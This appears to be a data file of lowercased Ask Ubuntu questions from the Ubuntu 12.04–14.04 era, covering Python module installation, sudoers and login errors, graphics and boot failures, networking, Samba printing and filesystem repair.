510214	beautiful soup 4 not working with python 3.4.0	i am using ubuntu 14.04 64 bit operating system . i installed beautiful soup 4 using this command : sudo apt-get install python-bs4 with python 2.7.6 , i had no difficulty importing the bs4 module . but when i used python 3.4.0 it showed me this error . > > > import bs4 traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named 'bs4' i also tried to install it using pip . sudo pip install beautifulsoup4 but again it did n't worked with python 3.4.0 . right now i have uninstalled pip and also uninstalled beautiful soup 4 sudo apt-get remove python-bs4 sudo apt-get remove python-pip what should i do next to properly install beautiful soup 4 for both python 2.7.6 and python 3.4.0 ? ?
510215	get access problem as admin user	i want to access `` sudoers '' file and also access `` su - '' but i fail and get following error please check terminal output that i have tried . i am m-usman ( admin ) but not allow to edit or access ? : ( m-usman @ muhammad-usman : ~ $ sudo gedit /etc/sudoers [ sudo ] password for m-usman : m-usman is not in the sudoers file . this incident will be reported . m-usman @ muhammad-usman : ~ $ su - password : su : authentication failure m-usman @ muhammad-usman : ~ $ sudo visudo [ sudo ] password for m-usman : m-usman is not in the sudoers file . this incident will be reported . how can i fix it ?
510216	trouble using cd command with `` ~ '' or `` $ home '' in bash scripting	we know that ~ and $ home refer to the home directory of the current user . ( for me echo ~=echo $ home=pandya ) . but i ca n't use it in bash scripting . here is a simple example script : # ! /bin/bash echo -n `` enter directory path : '' read dir1 cd $ dir1 but when executed , it gives error no such file or directory as follows : $ ./script enter directory path : ~/desktop ./script : line 4 : cd : ~/desktop : no such file or directory if /home/pandya used instead of ~ , then it is working . same problem with $ home . thus , how to properly use cd with ~ or $ home in such bash scripting ?
510217	how to accept only essential security updates ?	sometimes i am getting problem in software updates . so i would like to get only essential security updates and also need to make it as default . please let me know is there any way to sort out that ?
510219	how to merge images in a single pdf file	i have some images which i want to merge . the meaning of merge is that , if i have 5 images , i want to put hem near each other is this way : i want to do that command line . for example the command can be : foo image1 image2 image3 image4 image5 i am also looking for any way which merge lots of images because i have lots of images . by the way the output can be pdf or even in image format . and also it should be command line because i want to write that on bash file .
510226	network errors and poor throughput accessing my new nas	the nas stores my video library . i have a hp dv6 laptop with 4 gb of ram . it 's running windows 7 64-bit . ethernet attached to my home network via a realtec gigabit nic . my old nas was a western digital world book 1tb which was 100mb ethernet attached . it actually performed adequately but i ran out of space . i replaced it with a 4tb thecus n2310 which is gigabit attached . i use wireshark to sniff the network and capture the errors and intel nas performance toolkit to measure the throughput of my nas devices i have two hp dv6 's that behave the same generating network errors . i have a gateway desktop w/8gb or ram and an asus netbook that perform perfectly against the thecus . all systems run windows 7 pro 64 bit , except for the asus which runs 32 bit . i access the thecus via samba as a mounted drive on my desktop . when streaming video or running nas-pt i receive below errors and a significant loss of throughput . i should be getting about 50mb/s but due to these errors i am only getting 3-6mb/s and am unable to stream videos . tcp-dup ack , tcp out-of-order , tcp fast retransmission , tcp previous segment not captured these errors are in order of predominance . the interesting part is if i boot in safe mode w/networking the nic performs fine . also if i boot ubuntu i get excellent performance . i have tried running an ethernet cable directly between the thecus and the dv6 . i still received the same network errors but my throughput did increase from 3-6mb/s to 10mb/s ( insignificant ) . so , it 's not the ethernet cable and not switches and not network congestion causing this problem . i 've modified about every advanced network setting i could find to no avail .
510228	how to install vlc , wine , flash player in ubuntu 14.04 in offline mode ?	new user for ubuntu unable to use such application on education institute ...
510234	block a command	i do n't want any admin users in my system to execute the following command other than root . `` sudo cp /etc/sudoers `` is it possible to block it for admin users only ? i have tried lot but did n't get anything ?
510236	how do i list all currently installed `` winetricks '' ?	is there a way to list all the `` tricks '' you 've installed using winetricks ? ( i 'd like to submit a report to the appdb and i do n't know which exact packages i 've installed over the months . )
510242	unable to reinstall apache on ubuntu 12.04.5 lts	unfortunately , what i did : updated apt repository to install apache244 and installed it . uninstalled apache2.4 using following commands : apt-get remove apache* apt-get purge apache* apt-get clean apt-get autoremove while trying to reinstall apache2-2 , was facing problem , so by mistake , i deleted /etc/apt/sources.list.d directory . now , my problem is : when i try to install apache2-2 using apt-get , it shows unmet dependencies . when i try to install apache2-2 using aptitude install apache2 , it does not download any package . the error says that there are unmet dependencies related to apache2-2 installation like apache2-2-common , libaprutils , etc . even if i try to install these dependencies apache2-2-common , libaprutils ... it keeps on giving me the dependency list . please help . i have a bootable usb of ubuntu 12.04.5 with me ready .
510244	how to transfer a zip file into ubuntu server ?	i have d : /upload/jboss-eap-6.2.0.zip this file need to uploaded into ubuntu server i tried with following command scp d : /upload/jboss-eap-6.2.0.zip ubuntu @ ip-10-47-175-216 : /home/ubuntu
510245	lost my wireless connection after update	i am using ubuntu 12.04 and after clicking the update notification , i lost my wireless connection . i am able to connect using wired connection but not through wireless anymore . please help . thanks . iwconfig lo no wireless extensions . eth0 no wireless extensions . *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c7ffff memory : f7c80000-f7c8ffff
510247	enable php script to delete file	i have ubuntu 12.04 on my server . i am trying to delete files using a php script . but it does not allow me . every time i use unlink it gives me permission denied message . i am not allowed to use move_uploaded_file , chmod etc . i have tried to change the folder permission but no luck . so i think the problem is with server configuration . what should be the server settings that will allow me to delete a file . i have also tried to use shell_exec but that also did n't worked . please help .
510248	installing a hard drive to access existing files	all i want to do is get access to a hard drive to remove the files but the drive is not recognised by ubuntu . i have no idea of what version but i have just downloaded the os from what was stated as the official site and i assume it 's the latest version . i have tried to use ask but all i find is that i need to enter a whole heap of code that i know nothing about . the last ask ubuntu i tried mentioned something about a disk utility which looked promising but i could n't find it . i am totally new to anything linux and would really appreciate it if someone could give me some very basic detailed instructions , ( for dummies ) , on how to do this . just in case it 's needed the drive details are : western digital wd7500aacs any assistance gratefully accepted . nick
510251	can only login using nomodeset method	i am only able to log in if i via grub edit the startup option such that the nomodeset command is input if i do n't do this when logging on the screen flickers and goes blank . i understand it is likely a graphics card issue . i am running a nvidia fx 2000 graphics card can anyone help with a solution ? could one might be to permanently set the startup to nomodeset , unsure of the drawbacks to this ? i see others talk about updating the driver , unsure exactly how to do this ? also i have come across articles about reducing the refresh rate ? ?
510252	ubuntu no longer prompts for root privilege ( but does n't give it either )	so on 14.04 lts i was playing around with some settings to solve another problem , and somehow managed to screw things up and now ubuntu no longer asks for root privileges before trying to perform administrative actions . the catch is that my user does not have them by default , which means those actions all fail . i can still run `` sudo `` from terminal and it 'll ask for my password and work fine , but any gui that requires root just fails without asking anything . any ideas what i did wrong and how to solve it ? thanks in advance .
510255	ubuntu software center - how to manage favorite apps ?	i want to manage all installed application softwares associated with my account in ubuntu ( similar to playstore in android ) . my question : if i re-install os in my laptop , at that point of time , i have to install all application softwares , which i used before , one-by-one . instead of that is there any feature in 'ubuntu software center ' or some application manager kind of feature in ubuntu ?
510256	keyboard layout - certain keys work with altgr , other does n't	i run ubuntu 12.04 in virtualbox 4.3.14 on windows 7 with a swedish keyboard layout . in windows everything works fine but in ubuntu some keys/characters ( the most important for a programmer ) does n't work . this is the result from pressing the keys in the top row 1234567890+´ ( unmodified top row on keyboard ) @ £ $ € { [ ] } \ ( windows with altgr ) ¡ £ $ €¥ ± ( ubuntu with `` altgr '' ) more characters are broken ( pipe | is a notable example ) but the top row is the biggest problem . i can workaround this by enabling `` direct connection '' from my usb keyboard to virtualbox but then i have to manually disable that every time i switch out of virtualbox . i have tried different keyboard layout , sometimes @ et al works but then other characters are broken . i also tried sudo dpkg-reconfigure keyboard-configuration with default values , but it did n't change anything . i have guest additions installed ( from the built in virtual cd ) . i got my vb disk image from a colleague who does not have this problem , however , he does not have guest additions installed ( and hence ca n't use a higher resolution than 1024x768 , and i need to run ecplipse ... ) . he also have different installation of virtual box and windows . for example , the key for 2 should , in ubuntu , produce four different characters , 2 '' ² @ . the first three works fine , including superscript 2 that requires altgr-shift-2 , it is just plain altgr-2 to get @ that does not work on this key ( and all the other keys i have problem with ) . any ideas for a fix ?
510258	ubuntu 14.04 how to fix these problem to update system ?	falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/main/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] falhou ao buscar http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/source/sources 404 not found falhou ao buscar http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found falhou o download de alguns ficheiros de ă­ndice . foram ignorados ou os antigos foram usados em seu lugar . google translation from portuguese failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/main/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/binary-i386/packages 404 not found [ ip : 200.236.31.4 80 ] failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/source/sources 404 not found failed to fetch http : //ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found failed to download some index files . were ignored or older were used instead .
510261	14.04 freezes after splash | immediately after installing updates	laptop is a dell xps 14 ( l421x ) . i7 3517u with nvidia gt630m , 14.04 lts . i am using intel graphics drivers for linux , i do n't remember if i used nvidia drivers or not . got prompted for updates last night using gui , went ahead and installed . prompted for a reboot , rebooted . boots as follows : computer boots without issues . grub & linux are both installed on sdb ( msata ) . boot to msata . grub loads just fine . select ubuntu , either of the two kernels . ubuntu splash screen comes up briefly . system freezes on an all black screen with half of a solid cursor in the very top left corner . ca n't even get into a console , will only respond to power button . i can get into recovery mode , but i 'm not to sure what i 'm doing beyond things like looking for broken packages of which there are none . searching for ubuntu wo n't boot leads to 101 posts on reinstalling grub , but i 'm still looking . cheers .
510262	lcd screen resolution	i have intel atom board and when i boot it from flash or usb screen resolution comes with 1024x768 but i choosed lvds on bios with 800x600 18bit.on the other hand , i have a different board of inte atom when configure like above it gives me correct screen resolution . when i added kernel parameter video=800x600 @ 60 to syslinux -- > outputs are like below : $ fbset mode `` 800x600-0 '' - # d : 0.000 mhz , h : 0.000 khz , v : 0.000 hz geometry 800 600 800 600 32 timings 0 0 0 0 0 0 0 accel true rgba 8/16,8/8,8/0,0/0 endmode $ xrandr lvds1 connected 800x600+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 800x600 60.3 60.0* 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) $ cat /proc/fb 0 inteldrmfb 1 vesa vga kernel command line = video=800x600 @ 60 linux= yocto sato , also ubuntu is tried something on backside it doesnt change because lcd is 800x600 but characters doesnt fit to screen , screen is always 1024x768 i think . how can i fix the screen resolution and frame buffer resolution and lcd to 800x600 ? thanks .
510264	problems with black screen	i have a problem with my asus x551ma . i get all the time a black screen of death . also with ubuntu 14.04 i get a kernel panic , so i have to resort to ubuntu utopic unicorn . my problem is that i have to change the boot up from quiet splash to nomodeset . after install and restart i even do n't get into the grub menu and get the black screen instantly . how do i tell the ubuntu that i have to get into the grub menu . with ubuntu 14.04 it took me into the grub menu .
510265	graphic driver do n't work correctly , system kernel stays at 3.11.0-20	yesterday i updated graphic driver automatically and today my system do n't boot correctly . i could get to the login screen but after enter password system shows an error message and shows nothing . ( still could enter to the console mode by pressing ctrl+alt+f1 and even remote ssh connection working properly ) i searched solution for graphic driver and no luck . and i found that my system 's linux kernel version is still 3.11.0-20 , which may not up-to-date version and can not update via apt-get update command . ( and this would be main reason what i can not install graphic driver properly ) any solutions would be appriciate .
510267	software center , update manager	if i just try to open the ubuntu software center it crashes but if i open update manager it reels out the error below : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ng.archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' also if try to use the `` sudo apt-get install '' command it brings an error related to this . please help , i really need to get some work done now .
510269	how to install build-essential : i386 to compile a 32-bit executable on a 64-bit system ?	apt-get install build-essential : i386 does n't work at all : the following packages have unmet dependencies : build-essential : i386 : depends : gcc : i386 ( > = 4:4.4.3 ) but it is not going to be installed depends : g++ : i386 ( > = 4:4.4.3 ) but it is not going to be installed note the 14.04 tag . answers on trouble compiling a 32 bit binary on a 64 bit machine are outdated . also , there are no ./configure script to use the compile 32 bit on 64 bitsystem answer . more details i 'm trying to complite dfhack from quietust branch : https : //github.com/quietust/dfhack/ apt-get install gcc-multilib g++-multilib removed the cmake error at depends/protobuf/cmakelists.txt:60 ( message ) : could not find a working hash map implementation . please install gcc > = 4.4 , and all necessary 32-bit c++ development libraries . message , but -- could not find threads ( missing : threads_found ) ca n't locate xml/libxml.pm in @ inc ( you may need to install the xml : :libxml module ) ( @ inc contains : /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl . ) at xml/list.pl line 6 . begin failed -- compilation aborted at xml/list.pl line 6. is still there . do i have to manually seek all i386 build-essential the dependencies ?
510270	how to install ubuntu 14.04 inside window 7 using wubi without internet ?	although i have same release of ubuntu and wubi and are in same directoy . but also while installing it automatically connects to internet and starts downloading ubuntu . i have already downloaded ubuntu-14.04.1-desktop-i386.iso of 987mb . should i have to download other applications like metalink or something so that while installing internet will not be required ? please help me out..
510271	ubuntu 14.04 completely dead	after having issues with crashing due to graphics drivers issues . my new install freezes after login . if i try to recover using the usb i installed it with it boots up to the login screen with the screen not working . ( get login prompt sound , but no screen ) how do i recover ?
510272	ethernet not working on sony vaio e series `vpcea23en` in ubuntu 14.04	shashi @ shashi-vpcea23en : ~ $ sudo lshw -numeric -c network [ sudo ] password for shashi : *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) [ 168c:2b ] vendor : qualcomm atheros [ 168c ] physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 78 : dd:08 : d3 : dc:87 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-32-generic firmware=n/a ip=10.144.122.25 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : f4a00000-f4a0ffff *-network description : ethernet interface product : yukon optima 88e8059 [ pcie gigabit ethernet controller with avb ] [ 11ab:4381 ] vendor : marvell technology group ltd. [ 11ab ] physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 11 serial : 54:42:49:11 : a7:22 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=off broadcast=yes driver=sky2 driverversion=1.30 duplex=full latency=0 link=no multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : f2220000-f2223fff ioport : a000 ( size=256 ) memory : f2200000-f221ffff shashi @ shashi-vpcea23en : ~ $ sudo apt-get install ethtool reading package lists ... done building dependency tree reading state information ... done ethtool is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . shashi @ shashi-vpcea23en : ~ $ sudo ethtool -s eth0 speed 100 duplex full autoneg off shashi @ shashi-vpcea23en : ~ $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : no advertised auto-negotiation : no speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : off mdi-x : unknown supports wake-on : pg wake-on : g current message level : 0x000000ff ( 255 ) drv probe link timer ifdown ifup rx_err tx_err link detected : yes
510273	installed package on offline system	i have two system a : ubuntu 14.04 with internet b : ubuntu 14.04 without internet i have customized and installed missing files and packages on a . now i need to enable to play .mp3 files on b how do i do that ? overall i want to know how to install missing packages , in some zip or any package system ? how do i distribute the packege or it will done by single command ? update i run below command from this answer dpkg -l | grep `` ^ii '' | awk ' { print $ 2 } ' | xargs sudo apt-get -y install -- reinstall -- download-only now what to do ? please help .
510275	how do i install mupen64plus on lubuntu ?	how do i install mupen64plus on lubuntu ? i ca n't find it on the lubuntu software center . it is a tar.gz file .
510277	the scanner printer hp psc 1510 all-in-one does not work	the scanner of my hp psc 1510 all-in-one does not work , is that i should install some drive ? the printer prints normally , but when i try to scan a document on the scanner nothing happens . could someone help me ? i 'm using ubuntu 14.04
510282	help for lan intranet networking	i am a newbie in ubuntu . i have 8 new pcs installed with ubuntu 14.04 , i am unable to do networking in them . i want to share files in all pcs ubuntu to ubuntu which includes sharing a drive and folder both which will be then accessed by all members in our lan network when pcs are on i went for samba , followed all instructions made user , shared folder , changed the config file . did everything but still none of the pcs are showing in network . i also tried with ubuntu to windows sharing tutorials but didnt get any success ... more over ip messenger is also not working in 14.04lts please help ...
510283	black display after wake from suspend via closing the lid	i have bought a new hp 15-g002ax notebook recently , with processor : amd a8-6410 apu with amd radeon r5 graphics ă 4 graphics : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) i am using ubuntu 14.04 on my system dual-booted along with windows 8.1 when i try to suspend the laptop using the lid , and try to resume back , it just shows a black screen and i have no other option left , have to shut it down with brute force ( pressing the power key for long ) . why am i seeing this error ? is it due to my graphics or anything else . i have searched a lot on different forums , but i 'm not able to find a pre ise solution to this . i want to be able to put it on sleep and wake up easily : ) any help will be greatly appreciated . thanks : )
510284	are desktop files stored in hard drive ?	hi i 'm new to ubuntu and i do not know much about this os . the problem i am having is getting access to files on the desktop without booting the os , i am currently running a 14.04_live according to unetbootin but i currently can not access the login because i edited : /etc/lightdm/light ( something i ca n't remember ) .conf hopefully this can be resolved easily , thank you . edit : i edited the file when i was on the live usb , there is no ubuntu installed in my hard drive .
510285	how to remap default unity window placement shortcuts	i 'm using google docs quite often , and love the ability to change styles quickly by using ctrl + alt + numpad shortcut . however , with unity this system shortcut is already used for window placement . is there a way to change this ? i already had a look at the keyboard shortcuts system settings , and tried to find something in compiz config , but with no luck . that 's driving me crazy , i 'm so used to this shortcut ! thank you .
510293	how to add ssl support to python ?	on ubuntu 14.04 , i installed python 3 . now that i am programming with it , i had a problem with python and i am told that the error occurred because i did not install python with ssl support . is it possible to add ssl support to python without needing to uninstall and reinstall python from the start ? i ask this question following the comment on my question here .
510297	how do i fix a resized to bigger space gparted partition to show my data ?	ok so i recently got a hard drive and have been using it alot lately . i was trying to re-size it ( with data on it ) to take up the free space i had just made by deleting some partitions with a bunch of gb . so as i did this g-parted gave me an input/output error when it was 6.37gb in on making a copy to be able to re-size the partition . i tried to fix it by doing a check and repair but it just froze the program after a couple seconds and my hard drive stalled . i was worried by now so i tried to look up an easy fix . boy was i wrong . im going to give a list of what commands i used but i have no idea what happened after this because like an amateur that i am i walked away and i did something else while it was doing automatic processes ( -y ) : sudo fdisk -lu sudo fsck.ext4 -v /dev/sdb5 i kept saying yes to what it was asking it was asking questions that required a yes or no answer then i held the y key down for a while i got annoyed and then i shut the terminal down by hitting the x in the corner . ^ i repeated this process twice . i then preceded to open up a new terminal and typed this sudo fsck.ext4 -y /dev/sdb5 it did its thing and said something like mount blah blah at the end i cant remember . i then mounted my hard drive and it said i had 3.14gb out of 160gb available i originaly had 115gb on that partition and it was full ( before the resize ) i exited the terminal and did the same process again and it still was the same . sudo apt-get install testdisk sudo apt-get install photorec i installed both of these programs but i did not use them . i did this : sudo mke2fs -n /dev/sdb5 then i checked which superblocks were available for backup stuff : sudo mke2fs -n /dev/sdb5 mke2fs 1.42.9 ( 4-feb-2014 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 10354688 inodes , 41388032 blocks 2069401 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=0 1264 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 i then proceded to do this : sudo e2fsck -b 32768 /dev/sdb5 i did not get that far and exited the terminal again . i opened an new terminal and typed : sudo e2fsck -y -b 32768 /dev/sdb5 it automatically restored the sectors it thought should have been restored but i came up with even less gb than before : 1.15gb out of 160gb i then tried to use g-parted again to check and fix . it checked and fixed only 1.5gb . i closed g-parted and continued to : kind of just had it with my hard drive being broken and i stated to do more crazy stuff without thinking or making a backup : sudo e2fsck -y -b 98304 /dev/sdb5 it was even worse now now i had 1.03gb out of 160gb i then typed this sudo e2fsck -y -b 11239424 /dev/sdb5 and now i havenât touched my hard drive since . so if anybody can help me that would be appreciated ! i can try to explain more if you ask me too .
510298	can not print from windows and printer disapears after reboot	i have a home server running ubuntu 12.04 and have successfully installed my printer ( hp photosmart b109a ) on it with hplip . printed a test page and printed a file from my terminal using : cat somefile.txt | lpr i 've setup samba to share my printer : [ printers ] comment = all printers browseable = yes path = /var/spool/samba printable = yes guest ok = yes read only = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = yes still no problem , the printer shows up in as a network printer and i can install it on windows . but if i try to print via window 's nothing happens . the file does not show in the print queue ( neither on windows or ubuntu ) . even more strange is when i reboot the server , the printer gone in my shared folder . when i restart samba it returns , but still does not print .
510299	i pressed ecs+f3+power accidentally , while having ubuntu 14.04 installed	i 'm brought back to the 'chrome os is missing screen '' ... ctrl+d wo n't get rid of it nor enter i 'm pretty much stuck at this screen even when i restart .
510301	how will they make the software centre sync now that u1 is no longer available ?	as this questions says , the ubuntu 14.04 software center sync does n't work . below there is a comment by mattijsr : how will they make the sync work now that u1 is no longer available ? and my question is the same . is there an alternative ( 3rd party ) to sync it ? if not , will ubuntu/canonical bring something in to do that , in the same way just without using the u1 services ?
510303	phonegap plugin development	i 'm developing ubuntu web application using phonegap . from http : //docs.phonegap.com/en/2.7.0/guide_plugin-development_index.md.html i can see there is no explanation about plugin development in ubuntu platform . is it possible to add plugins on ubuntu ?
510305	network indicator icon in system tray is missing in 12.04	my network indicator icon is missing in 12.04 . i have tried all answers of askubuntu but no luck . when i run nm-applet or nm-applet & in terminal it gives message as ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon i have tried conf-editor also but nm-applet is not appearing under org category . i dont know what to do , please help me .
510318	external hard drive + google drive ( ubuntu 14.04 )	i 've just installed ubuntu 14.04 . besides of default hard drive , i got also external hard drive on which i would like to install google drive . how can i do it ? i 've read is there a google drive client available ? but i do n't know how to change the location ( from internal hard drive to external ) ? result of : sudo blkid ; sudo parted -l please find below . it 's in polish ; ) /dev/sda1 : uuid= '' 98c61393-a17a-4c01-ab52-49b62a33a3ff '' type= '' ext4 '' /dev/sda5 : uuid= '' cefb2e69-872b-4832-9ef5-7576d5082af9 '' type= '' swap '' /dev/sdb1 : label= '' data '' uuid= '' 6a5aa8035aa7ca61 '' type= '' ntfs '' model : ata plextor px-128m6 ( scsi ) dysk /dev/sda : 128gb rozmiar sektora ( logiczny/fizyczny ) : 512b/512b tablica partycji : msdos numer początek koniec rozmiar typ system plików flaga 1 1049kb 120gb 120gb primary ext4 ładowalna 2 120gb 128gb 8479mb extended 5 120gb 128gb 8479mb logical linux-swap ( v1 ) model : asmt 2105 ( scsi ) dysk /dev/sdb : 1000gb rozmiar sektora ( logiczny/fizyczny ) : 512b/512b tablica partycji : msdos numer początek koniec rozmiar typ system plików flaga 1 1049kb 1000gb 1000gb primary ntfs result of cat /etc/fstab # /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=98c61393-a17a-4c01-ab52-49b62a33a3ff / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=cefb2e69-872b-4832-9ef5-7576d5082af9 none swap sw 0 0 uuid=6a5aa8035aa7ca61 /home/suzk/drive ntfs-3g rw , exec , uid= , gid= , umask=0022 uuid=6a5aa8035aa7ca61 /home/suzk/drive ntfs-3g rw , exec , uid= , gid= , umask=0022 uuid=6a5aa8035aa7ca61 /home/suzk/drive ntfs-3g rw , exec , uid= , gid= , umask=0022 uuid=6a5aa8035aa7ca61 /home/suzk/drive ntfs-3g rw , exec , uid=1000 , gid=1000 , umask=0022 uuid=6a5aa8035aa7ca61 /home/suzk/drive ntfs-3g rw , exec , uid=1000 , gid=1000 , umask=0022 uuid=6
510319	start up issues after fresh install	i have a hp pavilion dv7-4263cl with the following specs memory module specifications total memory size 8gb processor specifications processor brand amd processor class phenom ii processor type triple-core processor speed 2.0ghz processor number p860 hard disk drive specifications capacity 640gb drive types hard drive hard drive speed 5400 rpm graphics specifications gpu/vpu ati mobility radeon hd 6370 s video memory itchable graphics optical drive specifications optical drive dvd super multi dual layer burner communications communications description integrated lan integrated wireless lan interface type 802.11b/g/n wireless networking integrated 10/100/1000 gigabit ethernet lan the issue is i use my hdmi port quite often but on the generic driver the port does not work . i have two proprietary amd drivers but if i load either one it wont fully load the computer after restart . i enter my log in credentials i get the purple desktop background and an error system program problem detected do you want to report the problem now ? regardless if i hit report problem or i hit cancel it just sends me to a blank purple desktop . this seems to only happen when i load the proprietary drivers , it has n't happened on the generic graphics driver . i have uninstalled about 5 times as this seems to be the only way to return the driver back to the generic . im really new to ubuntu can anyone help ?
510321	ubuntu wont show in windows bootloader	i have installed ubuntu 14.04 . i want to get back to windows xp to check something . however grub wouldnt let me . so i got boot repair on ubuntu . i then changed the boot drive from this drive ( ubuntu ) to windows md5 something . now i dont know how to get back onto ubuntu .
510324	desktops on demand windows managers ? `	are there any window managers that function like os x 's ? i 'm looking to be able to full screen apps and move back and forth between them . i would want to start with one virtual desktop and then i could create more on demand . i know i can specify more virtual desktops but i would like to find a on demand approach .
510325	ubuntu installation does not detect second hard drive	i have 2 sata hard drives 1 tb and a 500 gb i created another partition on 500gb hard drive but in ubuntu installation i cant see the partition i made only the hard drive and detects it like this : size : 467gb free space : unknown
510326	newest kernel 3.13.0-33 causes boot problems	i just installed the newest kernel 3.13.0-33 and after a reboot the computer wo n't boot further than the plymouth screen . normally , the mouse cursor would apear and my second monitor would show that it has a signal , but neither happened with the new kernel . i managed to select the last kernel version 3.13.0-32 in grub so i could boot again . is there a way to remove the newly installed kernel or to select 3.13.0-32 as the default one so i do n't have to select it everytime i boot ? do you have an idea why it does n't work ? specs asrock b75 pro3-m intel® core™ i5-3570k cpu @ 3.40ghz × 4 geforce gtx 660/pcie/sse2 16 gb ram
510327	adding a .tar.bz package to my local repository ?	i downloaded a software package in a .tar.bz file . i understand that i can install such packages through make install , but then there 's no easy way to uninstall . is there a way that i can add this package to my local repository , so that i can install/uninstall it through apt-get ?
510330	nm-applet options grayed out after update	originally nm-applet would n't show at startup on lubuntu 14.04 , but this was fixed after one of the recent kernel upgrades . nm-applet ended up starting twice , so i could remove it from the startup applications and it would still load on startup . though another problem had occurred . it loads , but all options seem to be grayed out . if i would open a second nm-applet from the terminal it works as expected . but only after being completely booted . if i would add nm-applet to the startup applications as before , i would end up with 2 applets being grayed out . therefore what would be making the option gray out ? is there a setting i could change or is this a kernel bug , that needs to be patched ?
